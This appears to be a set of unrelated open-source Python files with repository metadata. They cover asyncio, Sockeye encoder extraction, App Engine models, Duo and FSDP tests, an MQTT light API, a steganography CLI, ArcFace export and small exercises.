43e3573be44c7f7aa4600ff8a34e99a65cbdc5d1
[ "MIT" ]
null
null
null
python/asyncio/tasks.py
zeroam/TIL
43e3573be44c7f7aa4600ff8a34e99a65cbdc5d1
[ "MIT" ]
null
null
null
import asyncio async def my_task(seconds): """ A task to do for a number of seconds """ print('This task is taking {} seconds to complete'.format(seconds)) await asyncio.sleep(seconds) return 'task finished' if __name__ == '__main__': my_event_loop = asyncio.get_event_loop() try: print('task creation started') task_obj = my_event_loop.create_task(my_task(seconds=2)) my_event_loop.run_until_complete(task_obj) finally: my_event_loop.close() print("The task's result was: {}".format(task_obj.result()))
26.363636
71
0.668966
96050349c05924aa062803ddf5dd8d851a867f8b
5,081
py
Python
mltrain-nips-2017/yang_shi/vqa-mxnet-gluon/extract_encoder.py
gopala-kr/ds-notebooks
bc35430ecdd851f2ceab8f2437eec4d77cb59423
[ "MIT" ]
1
2019-05-10T09:16:23.000Z
2019-05-10T09:16:23.000Z
mltrain-nips-2017/yang_shi/vqa-mxnet-gluon/extract_encoder.py
gopala-kr/ds-notebooks
bc35430ecdd851f2ceab8f2437eec4d77cb59423
[ "MIT" ]
null
null
null
mltrain-nips-2017/yang_shi/vqa-mxnet-gluon/extract_encoder.py
gopala-kr/ds-notebooks
bc35430ecdd851f2ceab8f2437eec4d77cb59423
[ "MIT" ]
1
2019-10-14T07:30:18.000Z
2019-10-14T07:30:18.000Z
""" Simple Translate CLI """ from contextlib import ExitStack import mxnet as mx import sys import argparse import logging import time import sockeye.utils from sockeye.utils import acquire_gpu, get_num_gpus import sockeye.data_io import sockeye.arguments as arguments import sockeye.inference import re import numpy as np def main(): params = argparse.ArgumentParser(description='Translate from STDIN to STDOUT') params.add_argument('--model-prefixes', '-m', required=False, nargs='+', help='model prefix(es). Use multiple for ensemble decoding. ' + 'Model prefix determines config, best epoch params and vocab files.') params.add_argument('--epochs', '-e', required=False, default=None, type=int, nargs='+', help='If not given, chooses best epochs/checkpoints for each model. If specified, must have the same ' + 'length as --model-prefix and be integer') params.add_argument('--max-input-len', '-n', type=int, default=None, help='Maximum sentence length. Default: value from trained model(s).') params.add_argument('--output-type', default='translation', choices=["translation", "align_plot", "align_text"], help='Either print the translation or visualize the alignment. Default: translation') params.add_argument('--align-plot-prefix', default="align", help='Prefix used when plotting the alignment.') params.add_argument('--log-level', default=logging.INFO, type=int, choices=[logging.INFO, logging.WARN, logging.DEBUG]) params.add_argument('--beam-size', '-b', type=int, default=1, help='beam size. If == 1, greedy decode') params.add_argument('--ensemble-mode', type=str, default='linear', choices=['linear', 'log_linear'], help='Ensemble mode: linear or log-linear interpolation of model predictions. Default: linear') params.add_argument('--softmax-temperature', type=float, default=None, required=False, help='Controls peakiness of model predictions. Values < 1.0 produce peaked predictions, ' + 'values > 1.0 produce smoothed distributions.') params = arguments.add_device_args(params) args = params.parse_args() args.model_prefixes = ['model/'] assert args.beam_size > 0, "Beam size must be 1 or greater." if args.epochs is not None: assert len(args.epochs) == len(args.model_prefixes), "must provide epochs for each model" #sockeye.utils.setup_logging(args.log_level) logging.basicConfig(filename='test.log', level=logging.INFO) logging.info("Command: %s", " ".join(sys.argv)) logging.info("Arguments: %s", args) with ExitStack() as exit_stack: if args.use_cpu: context = mx.cpu() else: num_gpus = get_num_gpus() assert num_gpus > 0, "No GPUs found, consider running on the CPU with --use-cpu " \ "(note: check depends on nvidia-smi and this could also mean that the nvidia-smi " \ "binary isn't on the path)." assert len(args.device_ids) == 1, "cannot run on multiple devices for now" gpu_id = args.device_ids[0] if gpu_id < 0: # get an automatic gpu id: gpu_id = exit_stack.enter_context(acquire_gpu()) context = mx.gpu(gpu_id) translator = sockeye.inference.Translator(context, args.ensemble_mode, *sockeye.inference.load_models(context, args.max_input_len, args.beam_size, args.model_prefixes, args.epochs, args.softmax_temperature)) ############ CHANGE HERE ######################## sample_file = open('train_question_token.txt','r') encoder_file = open('train_question_encoder.txt', "w") ################################################# for i, line in enumerate(sample_file,1): trans_input = translator.make_input(i,line) source, source_length, bucket_key = translator._get_inference_input(trans_input.tokens) encoded_source, _ , _ , _, _ = translator.models[0].run_encoder(source, source_length, bucket_key) last_slice_source = mx.ndarray.mean(encoded_source, axis=1, keepdims=True) last_slice_source = last_slice_source.reshape((-1,)) encoder_file.write(" ".join(map(str, last_slice_source.asnumpy()))+"\n") encoder_file.close() if __name__ == '__main__': main()
51.846939
128
0.571147
7dc2a90ba4547195588f251869e654e8a1c3535b
2,552
py
Python
plugins/tff_backend/models/payment.py
threefoldfoundation/app_backend
b3cea2a3ff9e10efcc90d3d6e5e8e46b9e84312a
[ "Apache-2.0" ]
null
null
null
plugins/tff_backend/models/payment.py
threefoldfoundation/app_backend
b3cea2a3ff9e10efcc90d3d6e5e8e46b9e84312a
[ "Apache-2.0" ]
178
2017-08-02T12:58:06.000Z
2017-12-20T15:01:12.000Z
plugins/tff_backend/models/payment.py
threefoldfoundation/app_backend
b3cea2a3ff9e10efcc90d3d6e5e8e46b9e84312a
[ "Apache-2.0" ]
2
2018-01-10T10:43:12.000Z
2018-03-18T10:42:23.000Z
# -*- coding: utf-8 -*- # Copyright 2017 GIG Technology NV # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # # @@license_version:1.3@@ from google.appengine.ext import ndb from framework.models.common import NdbModel from plugins.tff_backend.plugin_consts import NAMESPACE class ThreeFoldBaseTransaction(NdbModel): NAMESPACE = NAMESPACE timestamp = ndb.IntegerProperty() unlock_timestamps = ndb.IntegerProperty(repeated=True, indexed=False) # type: list[int] unlock_amounts = ndb.IntegerProperty(repeated=True, indexed=False) # type: list[int] token = ndb.StringProperty() token_type = ndb.StringProperty() amount = ndb.IntegerProperty() precision = ndb.IntegerProperty(default=2) memo = ndb.StringProperty() usernames = ndb.StringProperty(repeated=True) from_username = ndb.StringProperty() to_username = ndb.StringProperty() class ThreeFoldTransaction(ThreeFoldBaseTransaction): amount_left = ndb.IntegerProperty() fully_spent = ndb.BooleanProperty() height = ndb.IntegerProperty() @property def id(self): return self.key.id() @classmethod def create_new(cls): return cls(namespace=NAMESPACE) @classmethod def list_with_amount_left(cls, username): return cls.query() \ .filter(cls.to_username == username) \ .filter(cls.fully_spent == False) \ .order(-cls.timestamp) # noQA class ThreeFoldPendingTransaction(ThreeFoldBaseTransaction): STATUS_PENDING = u'pending' STATUS_CONFIRMED = u'confirmed' STATUS_FAILED = u'failed' synced = ndb.BooleanProperty() synced_status = ndb.StringProperty() @property def id(self): return self.key.string_id().decode('utf8') @classmethod def create_key(cls, transaction_id): return ndb.Key(cls, u"%s" % transaction_id, namespace=NAMESPACE) @classmethod def list_by_user(cls, username): return cls.query() \ .filter(cls.usernames == username) \ .order(-cls.timestamp)
31.506173
92
0.704154
4858b0ab221bd6fcbedef2394043bc190ecf5a5e
983
py
Python
Packs/DuoAdminApi/Integrations/DuoEventCollector/DuoEventCollector_test.py
jrauen/content
81a92be1cbb053a5f26a6f325eff3afc0ca840e0
[ "MIT" ]
null
null
null
Packs/DuoAdminApi/Integrations/DuoEventCollector/DuoEventCollector_test.py
jrauen/content
81a92be1cbb053a5f26a6f325eff3afc0ca840e0
[ "MIT" ]
40
2022-03-03T07:34:00.000Z
2022-03-31T07:38:35.000Z
Packs/DuoAdminApi/Integrations/DuoEventCollector/DuoEventCollector_test.py
jrauen/content
81a92be1cbb053a5f26a6f325eff3afc0ca840e0
[ "MIT" ]
null
null
null
from DuoEventCollector import Client, GetEvents, LogType, Params demisto_params = {'after': '1 month', 'host': 'api-a1fdb00d.duosecurity.com', 'integration_key': 'DI47EXXXXXXXWRYV2', 'limit': '5', 'proxy': False, 'retries': '5', 'secret_key': {'password': 'YK6mtSzXXXXXXXXXXX', 'passwordChanged': False}} demisto_params['params'] = Params(**demisto_params, mintime={}) client = Client(demisto_params) get_events = GetEvents(client=client, request_order=[LogType.AUTHENTICATION, LogType.ADMINISTRATION, LogType.TELEPHONY]) def test_rotate_request_order(): get_events.rotate_request_order() assert get_events.request_order == [LogType.ADMINISTRATION, LogType.TELEPHONY, LogType.AUTHENTICATION] get_events.rotate_request_order() get_events.rotate_request_order() assert get_events.request_order == [LogType.AUTHENTICATION, LogType.ADMINISTRATION, LogType.TELEPHONY]
57.823529
120
0.699898
d21059497ff56cda89a8d1b389c15c04c01fa702
2,773
py
Python
src/api/light.py
th-koeln-intia/ip-sprachassistent-team1
69fbc06a326da91fd3d84f222eba6cd2b1a79975
[ "MIT" ]
1
2021-04-28T09:45:34.000Z
2021-04-28T09:45:34.000Z
src/api/light.py
th-koeln-intia/ip-sprachassistent-team1
69fbc06a326da91fd3d84f222eba6cd2b1a79975
[ "MIT" ]
1
2020-09-24T07:20:16.000Z
2020-09-24T07:20:16.000Z
src/api/light.py
th-koeln-intia/ip-sprachassistent-team1
69fbc06a326da91fd3d84f222eba6cd2b1a79975
[ "MIT" ]
1
2020-12-04T13:38:33.000Z
2020-12-04T13:38:33.000Z
from api.app import app from api import MQTT_HOST, MQTT_PORT from flask import request, Response, jsonify import json import paho.mqtt.publish as publish from json import JSONDecoder, JSONEncoder @app.route('/light/set', methods=['POST']) def set_light(): body = request.get_json() if body is None or 'friendly_name' not in body or 'payload' not in body: return jsonify({"error": "BAD_REQUEST"}), 400 else: publish_set(body['friendly_name'], json.dumps(body['payload'])) publish_feedback(json.dumps(body['feedback'])) return json.dumps(body), 200 @app.route('/light/set/raw', methods=['POST']) def set_light_raw(): body = request.get_json() if body is None: return jsonify({"error": "BAD_REQUEST"}), 400 friendly_name = get_friendly_name_from_rhasspy_intent(body) payload = create_payload_from_rhasspy_intent(body) publish_set(friendly_name, json.dumps(payload)) raw_text = get_raw_text_as_payload(body) publish_feedback(json.dumps(raw_text)) return json.dumps(body), 200 def create_payload_from_rhasspy_intent(dict): entities = dict.get('entities', None) if entities is None: return None state = next((x for x in entities if x['entity'] == 'state'), None) brightness = next((x for x in entities if x['entity'] == 'brightness'), None) color = next((x for x in entities if x['entity'] == 'color'), None) payload = {} if state is not None and 'value' in state: payload['state'] = state['value'] if brightness is not None and 'value' in brightness: payload['brightness'] = brightness['value'] if color is not None and 'value' in color: payload['color'] = color['value'] return payload def get_friendly_name_from_rhasspy_intent(dict): entities = dict.get('entities', None) if entities is None: return None room = next((e for e in entities if e['entity'] == 'room'), None) return room.get('value', None) def publish_set(friendly_name, payload): topic = 'zigbee2mqtt/' + friendly_name + '/set' publish.single(topic, payload, hostname=MQTT_HOST, port=MQTT_PORT) def publish_feedback(payload): topic = 'hermes/tts/say' publish.single(topic, payload, hostname=MQTT_HOST, port=MQTT_PORT) def get_raw_value_from_room_entity(dict): entities = dict.get('entities', None) if entities is None: return None room = next((e for e in entities if e['entity'] == 'room'), None) return room.get('raw_value', None) def get_raw_text_as_payload(dict): payload = {} payload['text'] = dict.get('raw_text', None) if(payload['text'] is not None): payload['text'] = 'Okay, ' + payload['text'] print(json.dumps(payload)) return payload
33.817073
81
0.673639
d27ffe7a1e06854e2ba699eea5d81dfb4945c148
1,901
py
Python
Steg2.py
Han-Lon/Steganosimple-Cryptor
8fb10993d51250fdfe25f02311f7143af21e8085
[ "MIT" ]
null
null
null
Steg2.py
Han-Lon/Steganosimple-Cryptor
8fb10993d51250fdfe25f02311f7143af21e8085
[ "MIT" ]
null
null
null
Steg2.py
Han-Lon/Steganosimple-Cryptor
8fb10993d51250fdfe25f02311f7143af21e8085
[ "MIT" ]
null
null
null
from stegano import lsb from tkinter import filedialog # A personal project to test out some Steganography functions. Steganography involves hiding data inside # image files (e.g. in the buffer, in unused bits, etc) without altering the physical appearance of the image at all. # Hide a message into an image using LSB method, and designate an output def hide(message, image, output): secret = lsb.hide(image, message) secret.save(output) # Reveal a message hidden in an image that was hidden using LSB method. Handles errors for if image # doesn't have a message hidden within it. def reveal(image): try: revealed = str.encode(lsb.reveal(image)) revealedfinal = str(revealed, encoding='utf-8') return revealedfinal except TypeError: print('ERROR! Image doesn\'t seem to have any hidden message.') if __name__ == '__main__': looper = True while looper: # Logic for interacting with the program in a CLI manner operation = input('Enter an operation - 1. Hide 2. Reveal \n') if operation == '1': print('Hide data option selected...') # Time to hide data in an image file message = input('\n Enter a message! \n') img_input = filedialog.askopenfilename() temp_path = img_input.split('.') output_path = temp_path[0] + '1' + '.png' hide(message, img_input, output_path) print('Message has been hidden in {}'.format(output_path)) elif operation == '2': # Time to pull data hidden in an image file print('Reveal data option selected...') img_input = filedialog.askopenfilename() output = reveal(img_input) print('Data hidden in the image file: {}'.format(output)) else: # Exit the function looper = False break
37.27451
117
0.634929
96714247c993e41c5762d3e61ed42c474feb4d08
2,136
py
Python
.arch/plugins/doc_lcdoc/serve.py
axiros/docutools
f99874a64afba8f5bc740049d843151ccd9ceaf7
[ "BSD-2-Clause" ]
24
2021-10-04T22:11:59.000Z
2022-02-02T21:51:43.000Z
.arch/plugins/doc_lcdoc/serve.py
axiros/docutools
f99874a64afba8f5bc740049d843151ccd9ceaf7
[ "BSD-2-Clause" ]
2
2021-10-04T21:51:30.000Z
2021-10-05T14:15:31.000Z
.arch/plugins/doc_lcdoc/serve.py
axiros/docutools
f99874a64afba8f5bc740049d843151ccd9ceaf7
[ "BSD-2-Clause" ]
null
null
null
#!/usr/bin/env python """ `doc serve` is a convenience tool which starts the live server together with doc pre_process (with working but changeable defaults) Note: You have to run this from the repo root of a checked out devapp project, which has a docs folder. """ from devapp.tools import FLG, exists from devapp.app import app, do, system, run_app import os, sys, json import time # ------------------------------------------------------------------------------ config from . import pre_process # import lit_prog_evaluation class Flags: autoshort = '' class lit_prog_evaluation(pre_process.Flags.lit_prog_evaluation): 'Example: re-evaluate only page config.md.lp: doc serve -lpe conf' d = 'md' class pre_proc: n = 'How to run doc pre_process' class port: n = 'mkdocs live server port. if the port is occupied (checked via netstat) we kill(!) the occupying other process' d = 8000 class only_kill: n = 'Action: Only kill server at port' d = False # ----------------------------------------------------------------------------- actions def kill_server(): p = FLG.port cmd = 'netstat -tanp | grep " LISTEN " | grep ":%s"' % p res = os.popen(cmd).read().strip().split() if not res: return app.warn('No server process was running at port', port=p) app.warn('Killing', proc=res) proc = res[-1].split('/', 1)[0] do(os.kill, int(proc), 9) app.warn('Server process at port killed', port=p) def start_server(): do(kill_server) cmd = 'mkdocs serve --livereload -a 127.0.0.1:%s &' % FLG.port do(system, cmd) def start_doc_preproc(): cmd = 'doc pre_process --lit_prog_evaluation=%s --lit_prog_evaluation_monitor=true' cmd = cmd % FLG.lit_prog_evaluation do(system, cmd) def run(): if FLG.only_kill: return do(kill_server) D = os.getcwd() if not exists(D + '/docs/'): app.die('You have to run doc serve within the repo root of a devapps checkout') do(start_server) p = FLG.port do(start_doc_preproc) main = lambda: run_app(run, flags=Flags)
26.7
123
0.606273
fb595e128f019ae4e13c45fab11da4f05a338717
1,016
py
Python
retro/enums.py
MatPoliquin/retro
c70c174a9818d1e97bc36e61abb4694d28fc68e1
[ "MIT-0", "MIT" ]
2,706
2018-04-05T18:28:50.000Z
2022-03-29T16:56:59.000Z
retro/enums.py
MatPoliquin/retro
c70c174a9818d1e97bc36e61abb4694d28fc68e1
[ "MIT-0", "MIT" ]
242
2018-04-05T22:30:42.000Z
2022-03-19T01:55:11.000Z
retro/enums.py
MatPoliquin/retro
c70c174a9818d1e97bc36e61abb4694d28fc68e1
[ "MIT-0", "MIT" ]
464
2018-04-05T19:10:34.000Z
2022-03-28T13:33:32.000Z
from enum import Enum class State(Enum): """ Special values for setting the restart state of the environment. You can also specify a string that is the name of the ``.state`` file """ DEFAULT = -1 #: Start the game at the default savestate from ``metadata.json`` NONE = 0 #: Start the game at the power on screen for the emulator class Observations(Enum): """ Different settings for the observation space of the environment """ IMAGE = 0 #: Use RGB image observations RAM = 1 #: Use RAM observations where you can see the memory of the game instead of the screen class Actions(Enum): """ Different settings for the action space of the environment """ ALL = 0 #: MultiBinary action space with no filtered actions FILTERED = 1 #: MultiBinary action space with invalid or not allowed actions filtered out DISCRETE = 2 #: Discrete action space for filtered actions MULTI_DISCRETE = 3 #: MultiDiscete action space for filtered actions
36.285714
99
0.695866
f766b23e2080d4363dc21b4a4bf6048e315bfffb
7,556
py
Python
test/distributed/fsdp/test_fsdp_checkpoint.py
vuanvin/pytorch
9267fd8d7395074001ad7cf2a8f28082dbff6b0b
[ "Intel" ]
5
2018-04-24T13:41:12.000Z
2019-07-09T07:32:09.000Z
test/distributed/fsdp/test_fsdp_checkpoint.py
vuanvin/pytorch
9267fd8d7395074001ad7cf2a8f28082dbff6b0b
[ "Intel" ]
14
2021-10-14T06:58:50.000Z
2021-12-17T11:51:07.000Z
test/distributed/fsdp/test_fsdp_checkpoint.py
vuanvin/pytorch
9267fd8d7395074001ad7cf2a8f28082dbff6b0b
[ "Intel" ]
7
2020-08-31T22:49:59.000Z
2020-09-15T14:29:07.000Z
# Owner(s): ["oncall: distributed"] import contextlib from copy import deepcopy from functools import partial import torch import torch.nn as nn from torch.distributed._fsdp.fully_sharded_data_parallel import ( FullyShardedDataParallel as FSDP, CPUOffload, ) from torch.distributed.algorithms._checkpoint._checkpoint_wrapper import ( checkpoint_wrapper, ) from torch.testing._internal.common_distributed import ( skip_if_lt_x_gpu, ) from torch.testing._internal.common_fsdp import ( FSDPTest, _maybe_wrap_fsdp, ) from torch.testing._internal.common_utils import ( run_tests, parametrize, instantiate_parametrized_tests, ) from torch.utils.checkpoint import checkpoint class TestFSDPCheckpoint(FSDPTest): class SequentialModule(nn.Module): def __init__( self, checkpoint_layer=False, offload_activations=False, wrap_fsdp=False, *fsdp_args, **fsdp_kwargs, ): torch.manual_seed(0) torch.cuda.manual_seed(0) super().__init__() l1 = nn.Linear(3, 3).cuda() l2 = nn.Linear(3, 3).cuda() l3 = nn.Linear(3, 3).cuda() if checkpoint_layer: ckpt_wrapper = partial( checkpoint_wrapper, offload_to_cpu=offload_activations ) l1 = ckpt_wrapper(l1) l2 = ckpt_wrapper(l2) l3 = ckpt_wrapper(l3) fsdp_wrapper = partial( _maybe_wrap_fsdp, wrap_fsdp=wrap_fsdp, *fsdp_args, **fsdp_kwargs ) self.ffn = nn.Sequential( fsdp_wrapper(l1), fsdp_wrapper(l2), fsdp_wrapper(l3), ) def forward(self, x): return self.ffn(x) def _verify_parity(self, losses, outputs, models): assert losses assert outputs assert models for (l, o) in zip(losses[1:], outputs[1:]): self.assertEqual(losses[0], l) self.assertEqual(outputs[0], o) # Verify grads ref_model = models[0] ref_grads = [p.grad for p in ref_model.parameters()] for m in models[1:]: grads = [p.grad for p in m.parameters()] for ref_g, g in zip(ref_grads, grads): self.assertEqual(ref_g, g) @skip_if_lt_x_gpu(2) @parametrize( "cpu_offload", [CPUOffload(offload_params=True), CPUOffload(offload_params=False)], ) @parametrize("offload_activations", [True, False]) def test_checkpoint_fsdp_wrapping(self, cpu_offload, offload_activations): # Test checkpoint(FSDP(layer1), FSDP(layer2), ....) ckpt_sequential_wrapped_fsdp = checkpoint_wrapper( TestFSDPCheckpoint.SequentialModule( wrap_fsdp=True, cpu_offload=cpu_offload ), offload_to_cpu=offload_activations, ) # Test FSDP(checkpoint(layer1)), FSDP(checkpoint(layer2)), .... inner_ckpt = TestFSDPCheckpoint.SequentialModule( checkpoint_layer=True, offload_activations=offload_activations, wrap_fsdp=True, cpu_offload=cpu_offload, ) baseline = TestFSDPCheckpoint.SequentialModule( wrap_fsdp=True, cpu_offload=cpu_offload ) # note that reentrant-based checkpointing requires inputs to have grad # flag set. inp = torch.randn(10, 3, device=torch.cuda.current_device(), requires_grad=True) models = [ckpt_sequential_wrapped_fsdp, inner_ckpt, baseline] offload_to_cpu_event = "Memcpy DtoH" for i in range(2): losses = [] outputs = [] for m in models: check_offload = m != baseline and i == 0 and offload_activations profiler_ctx = ( torch.profiler.profile(use_cuda=True) if check_offload else contextlib.suppress() ) with profiler_ctx as prof: out = m(inp) if check_offload: event_names = [event.name for event in prof.events()] offload_occured = any( offload_to_cpu_event in name for name in event_names ) self.assertTrue(offload_occured) loss = out.sum() loss.backward() losses.append(loss) outputs.append(out) self._verify_parity(losses, outputs, models) @skip_if_lt_x_gpu(2) @parametrize( "cpu_offload", [CPUOffload(offload_params=True), CPUOffload(offload_params=False)], ) @parametrize("offload_activations", [True, False]) def test_basic_checkpoint_end_to_end(self, cpu_offload, offload_activations): seq = TestFSDPCheckpoint.SequentialModule().to(torch.cuda.current_device()) # Runs FSDP with no checkpointing fsdp_only_seq = FSDP(deepcopy(seq), cpu_offload=cpu_offload) # Runs checkpoint-wrapped FSDP checkpointed_fsdp = checkpoint_wrapper( FSDP(deepcopy(seq), cpu_offload=cpu_offload), offload_to_cpu=offload_activations, ) # Runs FSDP-wrapped checkpointed module fsdp_wrapped_checkpoint = FSDP( checkpoint_wrapper(deepcopy(seq), offload_to_cpu=offload_activations), cpu_offload=cpu_offload, ) # Runs FSDP with manual calls to checkpoint. fsdp_call_checkpoint = FSDP(deepcopy(seq), cpu_offload=cpu_offload) # note that reentrant-based checkpointing requires inputs to have grad # flag set. inp = torch.randn(10, 3, device=torch.cuda.current_device(), requires_grad=True) models = [ fsdp_only_seq, checkpointed_fsdp, fsdp_wrapped_checkpoint, fsdp_call_checkpoint, ] offload_to_cpu_event = "Memcpy DtoH" for i in range(6): losses = [] outputs = [] for m in models: check_offload = m != fsdp_only_seq and i == 0 and offload_activations profiler_ctx = ( torch.profiler.profile(use_cuda=True) if check_offload else contextlib.suppress() ) with profiler_ctx as prof: if m == fsdp_call_checkpoint: offload_ctx = ( torch.autograd.graph.save_on_cpu(pin_memory=True) if offload_activations else contextlib.suppress() ) with offload_ctx: out = checkpoint(m, inp) else: out = m(inp) if check_offload: event_names = [event.name for event in prof.events()] offload_occured = any( offload_to_cpu_event in name for name in event_names ) self.assertTrue(offload_occured) loss = out.sum() loss.backward() losses.append(loss) outputs.append(out) self._verify_parity(losses, outputs, models) instantiate_parametrized_tests(TestFSDPCheckpoint) if __name__ == "__main__": run_tests()
34.190045
88
0.571731
f7913068c3042169ee6c413f8ef205e68a9963ab
2,716
py
Python
research/cv/arcface/modelarts/export.py
leelige/mindspore
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
[ "Apache-2.0" ]
77
2021-10-15T08:32:37.000Z
2022-03-30T13:09:11.000Z
research/cv/arcface/modelarts/export.py
leelige/mindspore
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
[ "Apache-2.0" ]
3
2021-10-30T14:44:57.000Z
2022-02-14T06:57:57.000Z
research/cv/arcface/modelarts/export.py
leelige/mindspore
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
[ "Apache-2.0" ]
24
2021-10-15T08:32:45.000Z
2022-03-24T18:45:20.000Z
# Copyright 2021 Huawei Technologies Co., Ltd # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================ """ python start.py """ import os import glob import argparse import numpy as np from mindspore import export from mindspore import Tensor from mindspore.train.serialization import load_checkpoint, load_param_into_net from src.iresnet import iresnet100 DATA_PATH = "/cache/data_path_" CKPT_PATH = "/cache/ckpt/" parser = argparse.ArgumentParser(description='Mindspore ImageNet Training') parser.add_argument('--train_url', default='', type=str, help='output path') parser.add_argument('--data_url', default='', type=str) # Datasets parser.add_argument('--batch_size', default=1, type=int, metavar='N', help='train batchsize (default: 256)') parser.add_argument('--modelarts', type=bool, default=True) args = parser.parse_args() def frozen_to_air(modelnet, modelargs): param_dict = load_checkpoint(modelargs.get("ckpt_file")) load_param_into_net(modelnet, param_dict) input_arr = Tensor( np.zeros([modelargs.get("batch_size"), 3, modelargs.get("height"), modelargs.get("width")], np.float32)) export(modelnet, input_arr, file_name=modelargs.get("file_name"), file_format=modelargs.get("file_format")) if __name__ == "__main__": import moxing as mox if not os.path.exists(DATA_PATH): os.makedirs(DATA_PATH, 0o755) mox.file.copy_parallel(src_url=args.data_url, dst_url=CKPT_PATH) prefix = "ArcFace" ckpt_list = glob.glob(CKPT_PATH + prefix + "*.ckpt") if not ckpt_list: print("ckpt file not generated.") ckpt_list.sort(key=os.path.getmtime) ckpt_model = ckpt_list[-1] net = iresnet100() frozen_to_air_args = {'ckpt_file': ckpt_model, 'batch_size': args.batch_size, 'height': 112, 'width': 112, 'file_name': (CKPT_PATH + prefix), 'file_format': 'AIR'} frozen_to_air(net, frozen_to_air_args) if args.modelarts: mox.file.copy_parallel(src_url=CKPT_PATH, dst_url=args.train_url)
36.213333
112
0.670471
540d424532ff9f498d7d0a5c8cc540f93970db70
713
py
Python
Python/pandas/01_series.py
Kreijeck/learning
eaffee08e61f2a34e01eb8f9f04519aac633f48c
[ "MIT" ]
null
null
null
Python/pandas/01_series.py
Kreijeck/learning
eaffee08e61f2a34e01eb8f9f04519aac633f48c
[ "MIT" ]
null
null
null
Python/pandas/01_series.py
Kreijeck/learning
eaffee08e61f2a34e01eb8f9f04519aac633f48c
[ "MIT" ]
null
null
null
import pandas as pd import numpy as np data = [22, 33, 41, 12] index = ["A", "B", "C", "D"] s = pd.Series(data, name='Age', index=index) print(s) print(s["B"]) print(s[2]) data_dict = { "A": 28, "B": 42, "C": 1337, "D": 43, } # index kann gesetzt werden und ändert auch die Reihenfolge und werte können # wiederholt werden s2 = pd.Series(data_dict, index=["A", 'B', 'D', 'E', 'C', 'A']) print(s2) #unnützer datatype wird zurückgesetzt s3 = pd.Series(np.random.randn(10), dtype=np.int32) print(s3) s3 = pd.Series(np.random.randint(12, 25, 10), dtype=np.int32) print(s3) # Achtun slice: nicht möglich: s[1:3][0], da index beibehalten wird # Filtern print(s3[s3 < s3.mean()]) print(np.log(s3))
20.970588
76
0.632539
54a5a39aa2099d456ab0d02ac4fb47014ac0ba69
1,400
py
Python
Problems/Depth-First Search/easy/MinimumAbsoluteDifferenceBST/min_abs_dif_bst.py
dolong2110/Algorithm-By-Problems-Python
31ecc7367aaabdd2b0ac0af7f63ca5796d70c730
[ "MIT" ]
1
2021-08-16T14:52:05.000Z
2021-08-16T14:52:05.000Z
Problems/Depth-First Search/easy/MinimumAbsoluteDifferenceBST/min_abs_dif_bst.py
dolong2110/Algorithm-By-Problems-Python
31ecc7367aaabdd2b0ac0af7f63ca5796d70c730
[ "MIT" ]
null
null
null
Problems/Depth-First Search/easy/MinimumAbsoluteDifferenceBST/min_abs_dif_bst.py
dolong2110/Algorithm-By-Problems-Python
31ecc7367aaabdd2b0ac0af7f63ca5796d70c730
[ "MIT" ]
null
null
null
from typing import Optional # Definition for a binary tree node. class TreeNode: def __init__(self, val=0, left=None, right=None): self.val = val self.left = left self.right = right # Recursive Magic # def getMinimumDifference(self, root: Optional[TreeNode]) -> int: # def get_min_dif(node, low, high): # if not node: # return high - low # # left = get_min_dif(node.left, low, node.val) # right = get_min_dif(node.right, node.val, high) # # return min(left, right) # # return get_min_dif(root, float('-inf'), float('inf')) # Recursive Inorder DFS # def getMinimumDifference(self, root: Optional[TreeNode]) -> int: # sorted_list = [] # # def dfs(node: Optional[TreeNode]): # if node.left: # dfs(node.left) # # sorted_list.append(node.val) # if node.right: # dfs(node.right) # # dfs(root) # return min(b - a for a, b in zip(sorted_list, sorted_list[1:])) # Recursive inorder DFS def getMinimumDifference(self, root: Optional[TreeNode]) -> int: sorted_list = [] def dfs(node): if node.left: dfs(node.left) sorted_list.append(node.val) if node.right: dfs(node.right) dfs(root) res = float('inf') for i in range(1, len(sorted_list)): res = min(res, sorted_list[i] - sorted_list[i - 1]) return res
25.925926
69
0.601429
49c2612eb15938f0206a41d0a6921f4dfbb8879e
679
py
Python
IVTp/2014/TITOV_S_G/task_6_22.py
YukkaSarasti/pythonintask
eadf4245abb65f4400a3bae30a4256b4658e009c
[ "Apache-2.0" ]
null
null
null
IVTp/2014/TITOV_S_G/task_6_22.py
YukkaSarasti/pythonintask
eadf4245abb65f4400a3bae30a4256b4658e009c
[ "Apache-2.0" ]
null
null
null
IVTp/2014/TITOV_S_G/task_6_22.py
YukkaSarasti/pythonintask
eadf4245abb65f4400a3bae30a4256b4658e009c
[ "Apache-2.0" ]
null
null
null
# Задача 6. Вариант 22. # Создайте игру, в которой компьютер загадывает имена двух братьев, легендарных основателей Рима, а игрок должен его угадать. # Titov S.G. # 11.04.2016 import random print ("Программа случайным образом загадывает имена двух братьев, легендарных основателей Рима, а игрок должен его угадать.") name_numbers = random.randint (1,2) if name_numbers == 1 : name = 'Ромул' elif name_numbers == 2 : name = 'Рем' answer = input ("Назовите одно из имен, легендарных основателей Рима: ") if answer == name: print ('\nВы угадали!') else : print ('\nВы не угадали!') print ('Правильный ответ:', name) input ("\nНажмите Enter для выхода.")
25.148148
126
0.705449
b72419d65127bf209e857f63197e4e47f112db09
1,198
py
Python
basics/lists.py
karinakozarova/Learning-Python
217dfc8ca6931a238445daf0b84e188c02916c52
[ "MIT" ]
1
2019-04-07T23:14:29.000Z
2019-04-07T23:14:29.000Z
basics/lists.py
karinakozarova/Learning-Python
217dfc8ca6931a238445daf0b84e188c02916c52
[ "MIT" ]
null
null
null
basics/lists.py
karinakozarova/Learning-Python
217dfc8ca6931a238445daf0b84e188c02916c52
[ "MIT" ]
null
null
null
